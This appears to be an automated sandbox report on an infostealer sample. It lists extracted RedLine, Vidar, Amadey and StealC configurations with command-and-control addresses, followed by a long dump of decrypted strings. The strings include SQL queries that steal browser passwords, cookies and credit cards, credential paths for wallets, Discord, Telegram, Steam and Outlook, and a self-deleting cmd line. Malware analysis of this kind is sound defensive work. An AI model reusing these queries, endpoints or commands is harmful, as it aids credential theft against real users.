Source: 26.0.buildred.exe.800000.0.unpack	Malware Configuration Extractor: RedLine {"C2 url": ["185.215.113.9:9137"], "Bot Id": "Logs", "Authorization Header": "f3f88d8c3034a76ac8ad2a0de6407050"}
Source: 0.2.file.exe.2600e67.1.raw.unpack	Malware Configuration Extractor: Vidar {"C2 url": "http://85.28.47.31silence"}
Source: explorti.exe.3652.19.memstrmin	Malware Configuration Extractor: Amadey {"C2 url": ["http://185.215.113.19/Vi9leo/index.php"]}
Source: ba77748b9b.exe.3144.22.memstrmin	Malware Configuration Extractor: StealC {"C2 url": "http://85.28.47.31/5499d72b3a3e55be.php"}

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Users\user\1000003002\ead6a72944.exe

Joe Sandbox ML: detected

Machine Learning detection for sample

Source: file.exe

Joe Sandbox ML: detected

Sample uses string decryption to hide its real strings

Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: INSERT_KEY_HERE
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: 22
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: 08
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: 20
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: 24
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: GetProcAddress
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: LoadLibraryA
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: lstrcatA
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: OpenEventA
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: CreateEventA
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: CloseHandle
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: Sleep
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: GetUserDefaultLangID
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: VirtualAllocExNuma
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: VirtualFree
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: GetSystemInfo
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: VirtualAlloc
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: HeapAlloc
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: GetComputerNameA
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: lstrcpyA
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: GetProcessHeap
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: GetCurrentProcess
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: lstrlenA
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: ExitProcess
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: GlobalMemoryStatusEx
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: GetSystemTime
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: SystemTimeToFileTime
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: advapi32.dll
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: gdi32.dll
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: user32.dll
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: crypt32.dll
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: ntdll.dll
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: GetUserNameA
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: CreateDCA
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: GetDeviceCaps
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: ReleaseDC
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: CryptStringToBinaryA
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: sscanf
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: VMwareVMware
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: HAL9TH
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: JohnDoe
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: DISPLAY
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: %hu/%hu/%hu
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: http://85.28.47.31
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: silence
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: /5499d72b3a3e55be.php
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: /8405906461a5200c/
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: sila
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: GetEnvironmentVariableA
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: GetFileAttributesA
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: GlobalLock
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: HeapFree
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: GetFileSize
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: GlobalSize
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: CreateToolhelp32Snapshot
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: IsWow64Process
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: Process32Next
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: GetLocalTime
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: FreeLibrary
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: GetTimeZoneInformation
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: GetSystemPowerStatus
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: GetVolumeInformationA
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: GetWindowsDirectoryA
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: Process32First
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: GetLocaleInfoA
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: GetUserDefaultLocaleName
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: GetModuleFileNameA
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: DeleteFileA
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: FindNextFileA
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: LocalFree
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: FindClose
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: SetEnvironmentVariableA
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: LocalAlloc
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: GetFileSizeEx
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: ReadFile
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: SetFilePointer
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: WriteFile
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: CreateFileA
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: FindFirstFileA
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: CopyFileA
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: VirtualProtect
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: GetLogicalProcessorInformationEx
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: GetLastError
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: lstrcpynA
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: MultiByteToWideChar
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: GlobalFree
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: WideCharToMultiByte
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: GlobalAlloc
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: OpenProcess
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: TerminateProcess
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: GetCurrentProcessId
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: gdiplus.dll
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: ole32.dll
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: bcrypt.dll
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: wininet.dll
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: shlwapi.dll
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: shell32.dll
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: psapi.dll
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: rstrtmgr.dll
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: CreateCompatibleBitmap
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: SelectObject
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: BitBlt
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: DeleteObject
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: CreateCompatibleDC
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: GdipGetImageEncodersSize
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: GdipGetImageEncoders
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: GdipCreateBitmapFromHBITMAP
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: GdiplusStartup
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: GdiplusShutdown
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: GdipSaveImageToStream
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: GdipDisposeImage
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: GdipFree
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: GetHGlobalFromStream
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: CreateStreamOnHGlobal
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: CoUninitialize
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: CoInitialize
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: CoCreateInstance
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: BCryptGenerateSymmetricKey
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: BCryptCloseAlgorithmProvider
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: BCryptDecrypt
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: BCryptSetProperty
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: BCryptDestroyKey
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: BCryptOpenAlgorithmProvider
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: GetWindowRect
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: GetDesktopWindow
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: GetDC
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: CloseWindow
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: wsprintfA
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: EnumDisplayDevicesA
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: GetKeyboardLayoutList
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: CharToOemW
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: wsprintfW
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: RegQueryValueExA
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: RegEnumKeyExA
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: RegOpenKeyExA
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: RegCloseKey
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: RegEnumValueA
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: CryptBinaryToStringA
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: CryptUnprotectData
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: SHGetFolderPathA
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: ShellExecuteExA
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: InternetOpenUrlA
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: InternetConnectA
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: InternetCloseHandle
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: InternetOpenA
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: HttpSendRequestA
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: HttpOpenRequestA
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: InternetReadFile
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: InternetCrackUrlA
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: StrCmpCA
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: StrStrA
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: StrCmpCW
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: PathMatchSpecA
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: GetModuleFileNameExA
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: RmStartSession
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: RmRegisterResources
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: RmGetList
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: RmEndSession
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: sqlite3_open
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: sqlite3_prepare_v2
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: sqlite3_step
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: sqlite3_column_text
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: sqlite3_finalize
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: sqlite3_close
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: sqlite3_column_bytes
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: sqlite3_column_blob
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: encrypted_key
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: PATH
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: C:\ProgramData\nss3.dll
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: NSS_Init
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: NSS_Shutdown
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: PK11_GetInternalKeySlot
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: PK11_FreeSlot
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: PK11_Authenticate
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: PK11SDR_Decrypt
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: C:\ProgramData\
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: SELECT origin_url, username_value, password_value FROM logins
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: browser:
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: profile:
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: url:
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: login:
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: password:
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: Opera
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: OperaGX
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: Network
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: cookies
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: .txt
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: SELECT HOST_KEY, is_httponly, path, is_secure, (expires_utc/1000000)-11644480800, name, encrypted_value from cookies
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: TRUE
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: FALSE
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: autofill
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: SELECT name, value FROM autofill
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: history
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: SELECT url FROM urls LIMIT 1000
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: cc
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: SELECT name_on_card, expiration_month, expiration_year, card_number_encrypted FROM credit_cards
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: name:
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: month:
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: year:
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: card:
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: Cookies
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: Login Data
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: Web Data
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: History
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: logins.json
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: formSubmitURL
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: usernameField
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: encryptedUsername
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: encryptedPassword
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: guid
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: SELECT host, isHttpOnly, path, isSecure, expiry, name, value FROM moz_cookies
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: SELECT fieldname, value FROM moz_formhistory
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: SELECT url FROM moz_places LIMIT 1000
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: cookies.sqlite
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: formhistory.sqlite
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: places.sqlite
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: plugins
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: Local Extension Settings
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: Sync Extension Settings
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: IndexedDB
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: Opera Stable
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: Opera GX Stable
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: CURRENT
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: chrome-extension_
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: _0.indexeddb.leveldb
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: Local State
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: profiles.ini
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: chrome
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: opera
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: firefox
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: wallets
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: %08lX%04lX%lu
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: SOFTWARE\Microsoft\Windows NT\CurrentVersion
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: ProductName
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: x32
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: x64
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: %d/%d/%d %d:%d:%d
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: ProcessorNameString
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: DisplayName
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: DisplayVersion
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: Network Info:
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: - IP: IP?
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: - Country: ISO?
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: System Summary:
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: - HWID:
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: - OS:
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: - Architecture:
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: - UserName:
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: - Computer Name:
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: - Local Time:
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: - UTC:
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: - Language:
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: - Keyboards:
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: - Laptop:
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: - Running Path:
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: - CPU:
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: - Threads:
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: - Cores:
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: - RAM:
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: - Display Resolution:
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: - GPU:
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: User Agents:
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: Installed Apps:
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: All Users:
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: Current User:
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: Process List:
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: system_info.txt
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: freebl3.dll
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: mozglue.dll
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: msvcp140.dll
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: nss3.dll
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: softokn3.dll
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: vcruntime140.dll
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: \Temp\
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: .exe
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: runas
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: open
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: /c start
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: %DESKTOP%
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: %APPDATA%
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: %LOCALAPPDATA%
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: %USERPROFILE%
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: %DOCUMENTS%
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: %PROGRAMFILES%
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: %PROGRAMFILES_86%
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: %RECENT%
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: *.lnk
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: files
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: \discord\
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: \Local Storage\leveldb\CURRENT
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: \Local Storage\leveldb
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: \Telegram Desktop\
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: key_datas
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: D877F783D5D3EF8C*
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: map*
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: A7FDF864FBC10B77*
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: A92DAA6EA6F891F2*
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: F8806DD0C461824F*
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: Telegram
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: Tox
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: *.tox
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: *.ini
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: Password
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: Software\Microsoft\Office\14.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: oftware\Microsoft\Windows Messaging Subsystem\Profiles\9375CFF0413111d3B88A00104B2A6676\
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: 00000001
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: 00000002
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: 00000003
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: 00000004
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: \Outlook\accounts.txt
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: Pidgin
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: \.purple\
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: accounts.xml
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: dQw4w9WgXcQ
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: token:
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: Software\Valve\Steam
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: SteamPath
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: \config\
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: ssfn*
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: config.vdf
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: DialogConfig.vdf
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: DialogConfigOverlay*.vdf
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: libraryfolders.vdf
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: loginusers.vdf
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: \Steam\
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: sqlite3.dll
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: browsers
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: done
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: soft
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: \Discord\tokens.txt
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: /c timeout /t 5 & del /f /q "
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: " & del "C:\ProgramData\*.dll"" & exit
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: C:\Windows\system32\cmd.exe
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: https
